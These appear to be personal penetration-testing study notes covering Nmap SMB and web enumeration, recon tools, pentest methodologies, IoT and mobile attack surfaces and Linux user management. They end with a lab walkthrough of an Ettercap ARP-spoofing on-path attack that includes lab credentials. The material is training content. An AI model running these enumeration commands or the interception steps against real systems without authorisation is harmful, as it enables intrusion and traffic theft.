For a penetration tester, group enumeration is helpful in determining the authorization roles that are being used in the target environment. The Nmap NSE script for enumerating SMB groups is smb-enum-groups. This script attempts to pull a list of groups from a remote Windows machine. You can also reveal the list of users who are members of those groups. The syntax of the command is as follows:

nmap --script smb-enum-groups.nse -p445 <host>_

Network Share Enumeration

Identifying systems on a network that are sharing files, folders, and printers is helpful in building out an attack surface of an internal network. The Nmap smb-enum-shares NSE script uses Microsoft Remote Procedure Call (MSRPC) for network share enumeration. The syntax of the Nmap smb-enum-shares.nse script is as follows:

nmap --script smb-enum-shares.nse -p 445 <host>_

Additional SMB Enumeration Examples

The system used in earlier examples (with the IP address 192.168.88.251) is running Linux and Samba. However, it is not easy to determine that it is a Linux system from the results of previous scans. An easy way to perform additional enumeration and fingerprinting of the applications and operating system running on a host is by using the nmap -sC command. The - sC option runs the most common NSE scripts based on the ports found to be open on the target system.

NOTE You can locate the installed NSE scripts in Kali Linux and Parrot OS by simply using the *locate .nse command. The site _https://nmap.org/book/man-nse.html includes a detailed explanation of the NSE and how to create new scripts using the Lua programming language.

You can also use tools such as [[enum4linux]] to enumerate Samba shares, including user accounts, shares, and other configurations. There is a Python-based enum4linux implementation called enum4linux-ng that can be downloaded from _https://github.com/cddmp/enum4linux-ng.

Web Page Enumeration/Web Application Enumeration

Once you have identified that a web server is running on a target host, the next step is to take a look at the web application and begin to map out the attack surface performing web page enumeration or often referred to as web application enumeration. You can map out the attack surface of a web application in a few different ways. The handy Nmap tool actually has an NSE script available for brute forcing the directory and file paths of web applications. Armed with a list of known files and directories used by common web applications, it probes the server for each of the items on the list. Based on the response from the server, it can determine whether those paths exist. This is handy for identifying things like the Apache or Tomcat default manager page that are commonly left on web servers and can be potential paths for exploitation. The syntax of the http-enum NSE script is as follows:

nmap -sV --script=http-enum <target>_

Another web server enumeration tool we should talk about is [[Nikto]]. Nikto is an open-source web vulnerability scanner that has been around for many years. It's not as robust as the commercial web vulnerability scanners; however, it is very handy for running a quick script to enumerate information about a web server and the applications it is hosting. Because of the speed at which Nikto works to scan a web server, it is very noisy. It provides a number of options for scanning, including the capability to authenticate to a web application that requires a username and password.

Service Enumeration

Service enumeration is the process of identifying the services running on a remote system, and it is a primary focus of what Nmap does as a port scanner. Earlier discussion in this module highlights the various scan types and how they can be used to bypass filters. When you are connected to a system that is on a directly connected network segment, you can run some additional scripts to enumerate further. A port scan takes the perspective of a credentialed remote user. The Nmap smb-enum-processes NSE script enumerates services on a Windows system, and it does so by using credentials of a user who has access to read the status of services that are running. This is a handy tool for remotely querying a Windows system to determine the exact list of services running. The syntax of the command is as follows:

nmap --script smb-enum-processes.nse --script-args smbusername=<username>_**, smbpass=**_<password>_ **-p445** _<host>_

[[Nmap]]
Exploring Enumeration via Packet Crafting using [[scapy]]

[Vault: Offensive Security] Exploitation

Thu, 09 Oct 2025 10:02:49 GMT

Reverse Shell - [[Netcat]]
Payloads
[[Metasploit]]
[[Hydra|Bruteforce attacks]]
Credential Stuffing
- Injecting breached account credentials in hopes of account takeover
- Use Intruder tab in [[Burpsuite]]
- use foxy proxy
[[linpeas]]

[Vault: Offensive Security] Methodologies

Thu, 09 Oct 2025 10:02:49 GMT

MITRE ATT&CK

The MITRE ATT&CK framework (https://attack.mitre.org) is an amazing resource for learning about an adversary’s tactics, techniques, and procedures (TTPs). Both offensive security professionals (penetration testers, red teamers, bug hunters, and so on) and incident responders and threat hunting teams use the MITRE ATT&CK framework today. The MITRE ATT&CK framework is a collection of different matrices of tactics, techniques, and subtechniques. These matrices–including the Enterprise ATT&CK Matrix, Network, Cloud, ICS, and Mobile–list the tactics and techniques that adversaries use while preparing for an attack, including gathering of information (open-source intelligence [OSINT], technical and people weakness identification, and more) as well as different exploitation and post-exploitation techniques.

OWASP WSTG

The OWASP Web Security Testing Guide (WSTG) is a comprehensive guide focused on web application testing. It is a compilation of many years of work by OWASP members. OWASP WSTG covers the high-level phases of web application security testing and digs deeper into the testing methods used. For instance, it goes as far as providing attack vectors for testing cross-site scripting (XSS), XML external entity (XXE) attacks, cross-site request forgery (CSRF), and SQL injection attacks; as well as how to prevent and mitigate these attacks. You will learn more about these attacks in Module 6, “Exploiting Application-Based Vulnerabilities.” From a web application security testing perspective, OWASP WSTG is the most detailed and comprehensive guide available. You can find the OWASP WSTG and related project information at https://owasp.org/www-project-web-security-testing-guide/.

NIST SP 800-115

Special Publication (SP) 800-115 is a document created by the National Institute of Standards and Technology (NIST), which is part of the U.S. Department of Commerce. NIST SP 800-115 provides organizations with guidelines on planning and conducting information security testing. It superseded the previous standard document, SP 800-42. SP 800-115 is considered an industry standard for penetration testing guidance and is called out in many other industry standards and documents. You can access NIST SP 800-115 at https://csrc.nist.gov/publications/detail/sp/800-115/final.

OSSTMM

The Open Source Security Testing Methodology Manual (OSSTMM), developed by Pete Herzog, has been around a long time. Distributed by the Institute for Security and Open Methodologies (ISECOM), the OSSTMM is a document that lays out repeatable and consistent security testing (https://www.isecom.org). It is currently in version 3, and version 4 is in draft status. The OSSTMM has the following key sections:

Operational Security Metrics
Trust Analysis
Work Flow
Human Security Testing
Physical Security Testing
Wireless Security Testing
Telecommunications Security Testing
Data Networks Security Testing
Compliance Regulations
Reporting with the Security Test Audit Report (STAR)

PTES

The Penetration Testing Execution Standard (PTES) (http://www.pentest-standard.org) provides information about types of attacks and methods, and it provides information on the latest tools available to accomplish the testing methods outlined. PTES involves seven distinct phases:

Pre-engagement interactions
Intelligence gathering
Threat modeling
Vulnerability analysis
Exploitation
Post-exploitation
Reporting

ISSAF

The Information Systems Security Assessment Framework (ISSAF) is another penetration testing methodology similar to the others on this list with some additional phases. ISSAF covers the following phases:

Information gathering
Network mapping
Vulnerability identification
Penetration
Gaining access and privilege escalation
Enumerating further
Compromising remote users/sites
Maintaining access
Covering the tracks

[Vault: Offensive Security] Reconnaissance

Thu, 09 Oct 2025 10:02:49 GMT

Active reconnaissance

Active reconnaissance is a method of information gathering in which the tools used actually send out probes to the target network or systems in order to elicit responses that are then used to determine the posture of the network or system. These probes can use various protocols and multiple levels of aggressiveness, typically based on what is being scanned and when. For example, you might be scanning a device such as a printer that does not have a very robust TCP/IP stack or network hardware. By sending active probes, you might crash such a device. Most modern devices do not have this problem; however, it is possible, so when doing active scanning, you should be conscious of this and adjust your scanner settings accordingly.

Common active reconnaissance tools and methods include the following:

Host enumeration
Network enumeration
User enumeration
Group enumeration
Network share enumeration
Web page enumeration
Application enumeration
Service enumeration
Packet crafting

Passive reconnaissance

Passive reconnaissance is a method of information gathering in which the tools do not interact directly with the target device or network. There are multiple methods of passive reconnaissance. Some involve using third-party databases to gather information. Others also use tools in such a way that they will not be detected by the target. These tools, in particular, work by simply listening to the traffic on the network and using intelligence to deduce information about the device communication on the network. This approach is much less invasive on a network, and it is highly unlikely for this type of reconnaissance to crash a system such as a printer. Because it does not produce any traffic, it is also unlikely to be detected and does not raise any flags on the network that it is surveying. Another scenario in which a passive scanner would come in handy would be for a penetration tester who needs to perform analysis on a production network that cannot be disrupted. The passive reconnaissance technique that you use depends on the type of information that you wish to obtain. One of the most important aspects of learning about penetration testing is developing a good methodology that will help you select the appropriate tools and technologies to use during the engagement.

Common passive reconnaissance tools and methods include the following:

Domain enumeration
Packet inspection
Open-source intelligence :: [[OSINT]]
[[recon-ng|Recon-ng]]
Eavesdropping

Reconnaissance tools

Domain Info

nslookup
- nslookup [domain]
- gives ip address
- > set type=any to get all info or we can specify record types
whois
- whois [domain]
- gives info on domain by querying the whois database
dig : to find subdomains
- basic usage : dig [domain]
- utilise zone tranfer
- dig axfr @[ip] [domain]
- to perform a query using a different DNS server is dig [_hostname_] @[_DNS server IP_] [_type_]
- Enter the dig command using the -x option to retrieve the hostname and record type of the DNS server with ip. dig -x [ip]
Reverse DNS (rDNS) lookups use the IP address to query for the host names of the services that resolve to that address.
host
- The Host utility is a function in Linux that performs lookups to convert IP addresses to host names. we can use this utility to find another host on the network.
- Host can also be used to perform a quick IP address lookup for a known hostname.
- host [ip] or host [domain]
dnsrecon
theharvester
- theHarvester is a tool that can be used to enumerate DNS information about a given hostname or IP address. It can query several data sources, including Baidu, Google, LinkedIn, public Pretty Good Privacy (PGP) servers, Twitter, vhost, Virus Total, ThreatCrowd, CRT.SH, Netcraft, and Yahoo.
- theHarvester -d [domain.com] -b [source|google]
crt.sh
- https://crt.sh

Finding valid subdomains

Subfinder - to find subdomains - subfinder -d website.com
sublist3r
- apt install sublist3r
- for subdomains : sublist3r -d site.com
- slow
Amass - github.com/OWASP/Amass
- to find subdomains
- faster/ preferred
- amass enum -passive -d domain.com
- httpx helps you to get different list of data from a website
  - subfinder -d example.com | httpx -title -ports 443,8443
waybacktool
- https://github.com/tomnomnom/waybackurls
- cd ~/go/bins
- cat [domains.txt] | ./waybackurls > [domain.urls]
waymore
waybackurl - https://github.com/tomnomnom/waybackurls
getallurl
httprobe
- github.com/tomnomnom/httprobe
- check if the pages in the wayback tool are valid
- `cat [domain.urls] | httprobe
- use httprobe -t 1000 to reduce time
Maltego Maltego, which gathers information from public records, is one of the most popular tools for passive reconnaissance. It supports numerous third-party integrations. There are several versions of Maltego, including a community edition (which is free) and several commercial Maltego client and server options. You can download and obtain more information about Maltego from https://www.paterva.com. Maltego can be used to find information about companies, individuals, gangs, educational institutions, political movement groups, religious groups, and so on. Maltego organizes query entities within the Entity Palette, and the search options are called “transforms.” Figure 10-6 shows a screenshot of the search results for a Person entity (in this case a search against this book’s coauthor Omar Santos). The results are hierarchical in nature, and you can perform additional queries/searches on the results (entities).

Active recon

[[Nmap]] / zenmap
[[enum4linux]]

[Vault: System Security] IOT Security

Thu, 09 Oct 2025 10:02:49 GMT

Attacking Internet of Things (IoT) Devices

IoT is an incredibly broad term that can be applied across personal devices, industrial control systems (ICS), transportation, and many other businesses and industries. Designing and securing IoT systems – (including supervisory control and data acquisition (SCADA), Industrial Internet of Things (IIoT), and ICS – involves a lot of complexity. For instance, IoT solutions have challenging integration requirements, and IoT growth is expanding beyond the support capability of traditional IT stakeholders (in terms of scalability and the skills required). Managing and orchestrating IoT systems introduces additional complexity due to disparate hardware and software, the use of legacy technologies, and, often, multiple vendors and integrators. IoT platforms must integrate a wide range of IoT edge devices with varying device constraints and must be integrated to back-end business applications. In addition, no single solution on the market today can be deployed across all IoT scenarios.

The IoT market is extremely large and includes multiple platform offerings from startups as well as very large vendors. In many cases, IoT environments span a range of components that include sensors, gateways, network connectivity, applications, and cloud infrastructure. The unfortunate reality is that most IoT security efforts today focus on only a few elements of the entire system. A secure IoT platform should provide the complete end-to-end infrastructure to build an IoT solution, including the software, management, and security to effectively collect, transform, transport, and deliver data to provide business value. This is, of course, easier said than done.

Analyzing IoT Protocols

Analyzing IoT protocols is important for tasks such as reconnaissance as well as exploitation. On the other hand, in the IoT world, you will frequently encounter custom, proprietary, or new network protocols. Some of the most common network protocols for IoT implementations include the following:

Wi-Fi
Bluetooth and Bluetooth Low Energy (BLE)
Zigbee
Z-Wave
LoraWAN
Insteon
Modbus
Siemens S7comm (S7 Communication)

For instance, Bluetooth Low Energy (BLE) is used by IoT home devices, medical, industrial, and government equipment. You can analyze protocols such as BLE by using specialized antennas and equipment such as the Ubertooth One (https://greatscottgadgets.com/ubertoothone/). BLE involves a three-phase process to establish a connection:

Phase 1. Pairing feature exchange
Phase 2. Short-term key generation
Phase 3. Transport-specific key distribution

BLE implements a number of cryptographic functions. It supports AES for encryption and key distribution exchange to share different keys among the BLE-enabled devices. However, many devices that support BLE do not even implement the BLE-layer encryption. In addition, mobile apps cannot control the pairing, which is done at the operating system level. Attackers can scan BLE devices or listen to BLE advertisements and leverage these misconfigurations. Then they can advertise clone/ fake BLE devices and perform on-path (formerly known as man-in-the-middle) attacks.

In some cases, IoT proprietary or custom protocols can be challenging. Even if you can capture network traffic, packet analyzers like Wireshark often can’t identify what you’ve found. Sometimes, you need to write new tools to communicate with IoT devices.

TIP Tools such as GATTacker (https://github.com/securing/gattacker) can be used to perform on-path attacks in BLE implementations. BtleJuice (https://github.com/DigitalSecurity/BtleJuice) is a framework for performing interception and manipulation of BLE traffic.

IoT Security Special Considerations

Fragile Environment

Many IoT devices (including sensors and gateways) have limited compute resources. Because of this lack of resources, some security features, including encryption, may not even be supported in IoT devices.

Availability Concerns

DoS attacks against IoT systems are a major concern.

Data Corruption

IoT protocols are often susceptible to input validation vulnerabilities, as well as data corruption issues.

Data Exfiltration

IoT devices could be manipulated by an attacker and used for sensitive data exfiltration.

Common IoT Vulnerabilities

Insecure defaults

Default credentials and insecure default configurations are often concerns with IoT devices. For instance, if you do a search in Shodan.io for IoT devices (or click on the Explore section), you will find hundreds of IoT devices with default credentials and insecure configurations exposed on the Internet.

Plaintext communication and data leakage

As mentioned earlier, some IoT devices do not provide support for encryption. Even if encryption is supported, many IoT devices fail to implement encrypted communications, and an attacker could easily steal sensitive information. The leakage of sensitive information is always a concern with IoT devices.

Hard-coded configurations

Often IoT vendors sell their products with hard-coded insecure configurations or credentials (including passwords, tokens, encryption keys, and more).

Outdated firmware/hardware and the use of insecure or outdated components

Many organizations continue to run outdated software and hardware in their IoT devices. In some cases, some of these devices are never updated! Think about an IoT device controlling different operations on an oil rig platform in the middle of the ocean. In some cases, these devices are never updated, and if you update them, you will have to send a crew to physically perform a software or hardware upgrade. IoT devices often lack a secure update mechanism.

Data Storage System Vulnerabilities

With the incredibly large number of IoT architectures and platforms available today, choosing which direction to focus on is a major challenge. IoT architectures extend from IoT endpoint devices (things) to intermediary “fog” networks and cloud computing. Gateways and edge nodes are devices such as switches, routers, and computing platforms that act as intermediaries (“the fog layer”) between the endpoints and the higher layers of the IoT system. The IoT architectural hierarchy high-level layers are

Cloud Services and Applications
Fog Networks
Gateways (Fog-Edge Nodes)
Endpoints (things)

Common misconfigurations of IoT devices

Misconfigurations in IoT on-premises and cloud-based solutions can lead to data theft. The following are some of the most common misconfigurations of IoT devices and cloud-based solutions.

Default/blank username/password

Hardcoded or default credentials are often left in place by administrators and in some cases by software developers, exposing devices or the cloud environment to different attacks.

Network exposure

Many IoT, ICS, and SCADA systems should never be exposed to the Internet (see https://www.shodan.io/explore/category/industrial-control-systems). For example, programmable logic controllers (PLCs) controlling turbines in a power plant, the lighting at a stadium, and robots in a factory should never be exposed to the Internet. However, you can often see such systems in Shodan scan results.

Lack of user input sanitization

Input validation vulnerabilities in protocols such as Modbus, S7 Communication, DNP3, and Zigbee could lead to DoS and code execution.

Underlying software vulnerabilities and injection vulnerabilities

IoT systems can be susceptible to SQL injection and similar vulnerabilities.

Error messages and debug handling

Many IoT systems include details in error messages and debugging output that can allow an attacker to obtain sensitive information from the system and underlying network.

Management Interface Vulnerabilities

IoT implementations have suffered from many management interface vulnerabilities. For example, the Intelligent Platform Management Interface (IPMI) is a collection of compute interface specifications (often used by IoT systems) designed to offer management and monitoring capabilities independently of the host system’s CPU, firmware, and operating system. System administrators can use IPMI to enable out-of-band management of computer systems (including IoT systems) and to monitor their operation. For instance, you can use IPMI to manage a system that may be powered off or otherwise unresponsive by using a network connection to the hardware rather than to an operating system or login shell. Many IoT devices have supported IPMI to allow administrators to remotely connect and manage such systems.

An IPMI subsystem includes a main controller, called a baseboard management controller (BMC), and other management controllers, called satellite controllers. The satellite controllers within the same physical device connect to the BMC via the system interface called Intelligent Platform Management Bus/Bridge (IPMB). Similarly, the BMC connects to satellite controllers or another BMC in other remote systems via the IPMB.

The BMC, which has direct access to the system’s motherboard and other hardware, may be leveraged to compromise the system. If you compromise the BMC, it will provide you with the ability to monitor, reboot, and even potentially install implants (or any other software) in the system. Access to the BMC is basically the same as physical access to the underlying system.

[Vault: System Security] Linux authentication and authorization

Thu, 09 Oct 2025 10:02:49 GMT

Responsible use of sudo

To manage authorization and authentication, you need to be a root user, or a user with elevated privileges to modify the system. The root user can also be called the “super user.” You become a root user by logging in as the root user. However, running commands as the root user is not recommended in Linux because it can create security risks if malicious actors compromise that account. It’s also easy to make irreversible mistakes, and the system can’t track who ran a command. For these reasons, rather than logging in as the root user, it’s recommended you use sudo in Linux when you need elevated privileges.

The sudo command temporarily grants elevated permissions to specific users. The name of this command comes from “super user do.” Users must be given access in a configuration file to use sudo. This file is called the “sudoers file.” Although using sudo is preferable to logging in as the root user, it's important to be aware that users with the elevated permissions to use sudo might be more at risk in the event of an attack.

You can compare this to a hotel with a master key. The master key can be used to access any room in the hotel. There are some workers at the hotel who need this key to perform their work. For example, to clean all the rooms, the janitor would scan their ID badge and then use this master key. However, if someone outside the hotel’s network gained access to the janitor’s ID badge and master key, they could access any room in the hotel. In this example, the janitor with the master key represents a user using sudo for elevated privileges. Because of the dangers of sudo, only users who really need to use it should have these permissions.

Additionally, even if you need access to sudo, you should be careful about using it with only the commands you need and nothing more. Running commands with sudo allows users to bypass the typical security controls that are in place to prevent elevated access to an attacker.

Note: Be aware of sudo if copying commands from an online source. It’s important you don’t use sudo accidentally.

Authentication and authorization with sudo

You can use sudo with many authentication and authorization management tasks. As a reminder, authentication is the process of verifying who someone is, and authorization is the concept of granting access to specific resources in a system. Some of the key commands used for these tasks include the following:

useradd

The useradd command adds a user to the system. To add a user with the username of fgarcia with sudo, enter sudo useradd fgarcia. There are additional options you can use with useradd:

-g: Sets the user’s default group, also called their primary group
-G: Adds the user to additional groups, also called supplemental or secondary groups

To use the -g option, the primary group must be specified after -g. For example, entering sudo useradd -g security fgarcia adds fgarcia as a new user and assigns their primary group to be security.

To use the -G option, the supplemental group must be passed into the command after -G. You can add more than one supplemental group at a time with the -G option. Entering sudo useradd -G finance,admin fgarcia adds fgarcia as a new user and adds them to the existing finance and admin groups.

usermod

The usermod command modifies existing user accounts. The same -g and -G options from the useradd command can be used with usermod if a user already exists.

To change the primary group of an existing user, you need the -g option. For example, entering sudo usermod -g executive fgarcia would change fgarcia’s primary group to the executive group.

To add a supplemental group for an existing user, you need the -G option. You also need a -a option, which appends the user to an existing group and is only used with the -G option. For example, entering sudo usermod -a -G marketing fgarcia would add the existing fgarcia user to the supplemental marketing group.

Note: When changing the supplemental group of an existing user, if you don't include the -a option, -G will replace any existing supplemental groups with the groups specified after usermod. Using -a with -G ensures that the new groups are added but existing groups are not replaced.

There are other options you can use with usermod to specify how you want to modify the user, including:

-d: Changes the user’s home directory.
-l: Changes the user’s login name.
-L: Locks the account so the user can’t log in.

The option always goes after the usermod command. For example, to change fgarcia’s home directory to /home/garcia_f, enter sudo usermod -d /home/garcia_f fgarcia. The option -d directly follows the command usermod before the other two needed arguments.

userdel

The userdel command deletes a user from the system. For example, entering sudo userdel fgarcia deletes fgarcia as a user. Be careful before you delete a user using this command.

The userdel command doesn’t delete the files in the user’s home directory unless you use the -r option. Entering sudo userdel -r fgarcia would delete fgarcia as a user and delete all files in their home directory. Before deleting any user files, you should ensure you have backups in case you need them later.

Note: Instead of deleting the user, you could consider deactivating their account with usermod -L. This prevents the user from logging in while still giving you access to their account and associated permissions. For example, if a user left an organization, this option would allow you to identify which files they have ownership over, so you could move this ownership to other users.

Note: When you create a new user in Linux, a group with the same name as the user is automatically created and the user is the only member of that group. After removing users, it is good practice to clean up any such empty groups that may remain behind. use the command groupdel to delete groups.

chown

The chown command changes ownership of a file or directory. You can use chown to change user or group ownership. To change the user owner of the access.txt file to fgarcia, enter sudo chown fgarcia access.txt. To change the group owner of access.txt to security, enter sudo chown :security access.txt. You must enter a colon (:) before security to designate it as a group name.

Similar to useradd, usermod, and userdel, there are additional options that can be used with chown.

[Vault: System Security] Mobile device security

Thu, 09 Oct 2025 10:02:49 GMT

Attacking Mobile Devices

Attackers use various techniques to compromise mobile devices.

Reverse Engineering

The process of analyzing the compiled mobile app to extract information about its source code could be used to understand the underlying architecture of a mobile application and potentially manipulate the mobile device. Attackers use reverse engineering techniques to compromise the mobile device operating system (for example, Android, Apple iOS) and root or jailbreak mobile devices.

NOTE OWASP has different “crack-me” exercises that help you practice reverse engineering of Android and iOS applications. See https://github.com/OWASP/owasp-mstg/tree/master/Crackmes.

Sandbox Analysis

iOS and Android apps are isolated from each other via sandbox environments. Sandboxes in mobile devices are a mandatory access control mechanism describing the resources that a mobile app can and can’t access. Android and iOS provide different interprocess communication (IPC) options for mobile applications to communicate with the underlying operating system. An attacker could perform detailed analysis of the sandbox implementation in a mobile device to potentially bypass the access control mechanisms implemented by Google (Android) or Apple (iOS), as well as mobile app developers.

Spamming

Unsolicited messages are a problem with email and with text messages and other mobile messaging applications as well. In Module 4, you learned about SMS phishing attacks, which continue to be some of the most common attacks against mobile users. In such an attack, a user may be presented with links that could redirect to malicious sites to steal sensitive information or install malware.

Vulnerabilities affecting mobile devices

Insecure storage

A best practice is to save as little sensitive data as possible in a mobile device’s permanent local storage. However, at least some user data must be stored on most mobile devices. Both Android and iOS provide secure storage APIs that allow mobile app developers to use the cryptographic hardware available on the mobile platform. If these resources are used correctly, sensitive data and files can be secured via hardware-based strong encryption. However, mobile app developers often do not use these secure storage APIs successfully, and an attacker could leverage these vulnerabilities. For example, the iOS Keychain is designed to securely store sensitive information, such as encryption keys and session tokens. It uses an SQLite database that can be accessed through the Keychain APIs only. An attacker could use static analysis or reverse engineering to see how applications create keys and store them in the Keychain.

Passcode vulnerabilities and biometrics integrations

Often mobile users “unlock” a mobile device by providing a valid PIN (passcode) or password or by using biometric authentication, such as fingerprint scanning or face recognition. Android and iOS provide different methods for integrating local authentication into mobile applications. Vulnerabilities in these integrations could lead to sensitive data exposure and full compromise of the mobile device. Attacks such as the objection biometric bypass attack can be used to bypass local authentication in iOS and Android devices. OWASP provides guidance on how to test iOS local authentication at https://github.com/OWASP/owasp-mstg/blob/master/Document/0x06f-Testing-Local-Authentication.md.

Certificate pinning

Attackers use certificate pinning to associate a mobile app with a particular digital certificate of a server. The purpose is to avoid accepting any certificate signed by a trusted certificate authority (CA). The idea is to force the mobile app to store the server certificate or public key and subsequently establish connections only to the trusted/known server (referred to as “pinning” the server). The goal of certificate pinning is to reduce the attack surface by removing the trust in external CAs. There have been many incidents in which CAs have been compromised or tricked into issuing certificates to impostors. Attackers have tried to bypass certificate pinning by jailbreaking mobile devices and using utilities such as SSL Kill Switch 2 (see https://github.com/nabla-c0d3/ssl-kill-switch2) or Burp Suite Mobile Assistant app or by using binary patching and replacing the digital certificate.

Using known vulnerable components

Attackers may leverage known vulnerabilities against the underlying mobile operating system, or dependency vulnerabilities (that is, vulnerabilities in dependencies of a mobile application). Patching fragmentation is one of the biggest challenges in Android-based implementations. Android fragmentation is the term applied to the numerous Android versions that are supported or not supported by different mobile devices. Keep in mind that Android is not only used in mobile devices but also in IoT environments. Some mobile platforms or IoT devices may not support a version of Android that has addressed known security vulnerabilities. Attackers can leverage these compatibility issues and limitations to exploit such vulnerabilities.

Execution of activities using root and over-reach of permissions

Application developers must practice the least privilege concept. That is, they should not allow mobile applications to run as root and should give them only the access they need to perform their tasks.

Business logic vulnerabilities

An attacker can use legitimate transactions and flows of an application in a way that results in a negative behavior or outcome. Most common business logic problems are different from the typical security vulnerabilities in applications (such as XSS, CSRF, and SQL injection). A challenge with business logic flaws is that they can’t typically be found by using scanners or any other similar tools.

Tools commonly used to perform security research and test the security posture of mobile devices

Burp Suite
Drozer
This Android testing platform and framework provides access to numerous exploits that can be used to attack Android platforms. You can download Drozer from https://labs.withsecure.com/tools/drozer. needle This open-source framework is used to test the security of iOS applications. You can download needle from https://github.com/WithSecureLabs/needle. Mobile Security Framework (MobSF)
MobSF is an automated mobile application and malware analysis framework. You can download it from https://github.com/MobSF/Mobile-Security-Framework-MobSF. Postman
Postman is used to test and develop APIs. You can obtain information and download it from h ttps://www.postman.com. Ettercap
This tool is used to perform on-path attacks. You can download Ettercap from https://www.ettercap-project.org. An alternative tool to Ettercap, called Bettercap, is available at https://www.bettercap.org. Frida
Frida is a dynamic instrumentation toolkit for security researchers and reverse engineers. You can download it from https://frida.re. Objection
This runtime mobile platform and app exploration toolkit uses Frida behind the scenes. You can use Objection to bypass certificate pinning, dump keychains, perform memory analysis, and launch other mobile attacks. You can download Objection from https://github.com/sensepost/objection. Android SDK tools
You can use Android SDK tools to analyze and obtain detailed information about the Android environment. You can download Android Studio, which is the primary Android SDK provided by Google, from https://developer.android.com/studio. ApkX
This tool enables you to decompile Android application package (APK) files. You can download it from https://github.com/b-mueller/apkx. APK Studio
You can use this tool to reverse engineer Android applications. You can download APK Studio from https://github.com/vaibhavpandeyvpz/apkstudio.

[Vault: Tools] Burpsuite

Thu, 09 Oct 2025 10:02:49 GMT

A web proxy is a piece of software that is typically installed in the attacker’s system to intercept, modify, or delete transactions between a web browser and a web application.

Burp Suite is an integrated platform for performing security testing of web applications. It includes various tools for scanning, fuzzing, intercepting, and analysing web traffic. It is used by security professionals worldwide to find and exploit vulnerabilities in web applications.

also an network proxy
to setup
- Firefox/Preferences/General/Network Proxy/Settings/Manual proxy configuration -> http proxy: 127.0.0.1:8080 / ✅ use this proxy server for all protocols
- go to https://burp and download the CA certificate and install in firefox.(preferences/privacy and security/Certificates/view/import/select cert )

[Vault: Tools] enum4linux

Thu, 09 Oct 2025 10:02:49 GMT

Enum4linux is a tool for enumerating information from Windows and Samba. Samba is an application that enables Linux and Apple clients to participate in Windows networks. It enables non-Windows clients to utilize the Server Message Block (SMB) protocol to access file and print services. Samba servers can participate in a Windows domain, both as a client and a server. Simple wrapper around the tools in the samba package to provide similar functionality to enum.exe (formerly from www.bindview.com).

Most enum4linux commands must be run as root, so use the sudo su command to obtain persistent root access.
usage: enum4linux.pl [options] [ip]

Options are (like "enum"): -U get userlist -M get machine list* -S get sharelist -P get password policy information -G get group and member list -d be detailed, applies to -U and -S -i Get printer information -o Get OS information -u user specify username to use (default "")
-p pass specify password to use (default "")
-a Do all simple enumeration (-U -S -G -P -r -o -n -i). This option is enabled if you don't provide any other options.

Some terms:

Relative Identifier (RID): Uniquely identifies a user, group, system, or domain.
Security Identifier (SID): Uniquely identifies users and groups within the local domain. Globally unique so can also work between domains.
Domain Controller (DC): Domain controller is a server that manages network and identity security requests. It authenticates users and determines whether the users are allowed to access IT resources in the domain.
Lightweight Directory Access Protocol (LDAP): a directory access protocol that enables services and clients that use LDAP naming services to communicate.
Workgroup: a group of standalone computers that are independently administered.

[Vault: Tools] ettercap

Thu, 09 Oct 2025 10:02:49 GMT

Ettercap is used to perform on-path/[[MITM or On-Path Attacks]]. The goal of an on-path attack is to intercept traffic between devices to obtain information that can be used to impersonate the target or to alter data being transmitted. The attacker is situated” between” two communicating hosts. In on-path attacks, the hacker doesn’t need to compromise the target device, but can just sniff traffic passing back and forth between the target and destination. Ettercap is used as an on-path tool, and the attack machine is on the same IP network as the victim.

Four user interfaces are available for the Ettercap tool

  -T, --text                  use text only GUI
       -q, --quiet                 do not display packet contents
       -s, --script <CMD>          issue these commands to the GUI
  -C, --curses                use curses GUI
  -D, --daemon                daemonize ettercap (no GUI)
  -G, --gtk                   use GTK+ GUI

Part 1: Launch Ettercap and Explore its Capabilities.

Step 1: Set up an ARP spoofing attack.

In this attack, you will use ARP spoofing to redirect traffic on the local virtual network to your Kali Linux system at 10.6.6.1. ARP spoofing is often used to impersonate the default gateway router to capture all traffic entering or leaving the local IP network. Because your lab environment uses an internal virtual network, instead of spoofing the default gateway, you will use ARP spoofing to redirect traffic that is destined for a local server with the address 10.6.6.13.

Load Kali Linux using the username kali and the password kali. Open a terminal session from the menu bar at the top of the screen.
The target host in this lab is the Linux device at 10.6.6.23. To view the network from the target perspective, and initiate traffic between the target and the server, use SSH to log in to this host. The username is labuser and the password is Cisco123.

The user of the 10.6.6.23 host is communicating with the server at 10.6.6.13. The on-path attacker at 10.6.6.1 (your Kali VM) will intercept and relay traffic between these hosts.

ssh -l labuser 10.6.6.23
labuser@10.6.6.23’s password: **Cisco123**

3. Because you are creating an on-path attack that uses ARP spoofing, you will be monitoring the ARP mappings on the victim host. The attack will cause changes to those mappings.

Use the command ip neighbor to view the current ARP cache on the target computer. Note: The hostname 3fb0515ea2f7 maybe different for your Kali VM environment.

labuser@3fb0515ea2f7:/$ **ip neighbor**
10.6.6.1 dev eth0 llanddr 02:42:17:81:d2:45 REACHABLE (output may vary)

you can also use the command arp -a with sudo in place of ip neighbor to view the current ARP cache throughout this activity.

labuser@gravemind:/$ **su -**
Password: **Cisco123**
root@gravemind:/$ **arp -a**
? (10.6.6.1) at 02:42:17:d5:bb:2b:ab [ether] on eth0

![[attachments/ettercap-IMG-20260131121036668.png|600|500]]

Step 2: Load Ettercap GUI interface to begin scanning.

Open a new terminal session from the menu bar in Kali Linux. Do not close the SSH-terminal that is running the session with 10.6.6.23.
Use the ettercap -h command to view the help file for the Ettercap application.
In this part, you will use a GUI interface to access Ettercap. Start Ettercap GTK+ graphical user interface using the ettercap -G command. Most Ettercap functions require root permissions, so use the sudo command to obtain the required permissions.

sudo ettercap -G

The Ettercap GUI opens in a new window. You are sniffing traffic on an internal, virtual network. The default setup is to scan using interface eth0. Change the sniffing interface to br-internal, which is the interface that is configured on the 10.6.6.0/24 virtual network, by changing the value in the Setup > Primary Interface dropdown.
Click the checkbox icon at the top right of the Ettercap screen to continue. A message appears at the bottom of the screen indicating that Unified sniffing has started.

Part 2: Perform the On-Path (MITM) Attack

Step 1: Select the Target Devices.

In the Ettercap GUI window, open the Hosts List window by clicking the Ettercap menu (three dots icon). Select the Hosts entry and then Hosts List. Click the Scan for Hosts icon (magnifying glass) at top left in the menu bar. A list of the hosts that were discovered on the 10.6.6.0/24 network appears in the Host List window.
Define the source and destination devices for the attack. To do so, click the IP address 10.6.6.23 in the window to highlight the target user host. Click the Add to Target 1 button at the bottom of the Host List window. This defines the user’s host as Target 1.
Click the IP address of the destination web server at 10.6.6.13 to highlight the line. Click the Add to Target 2 button at the bottom of the host window.

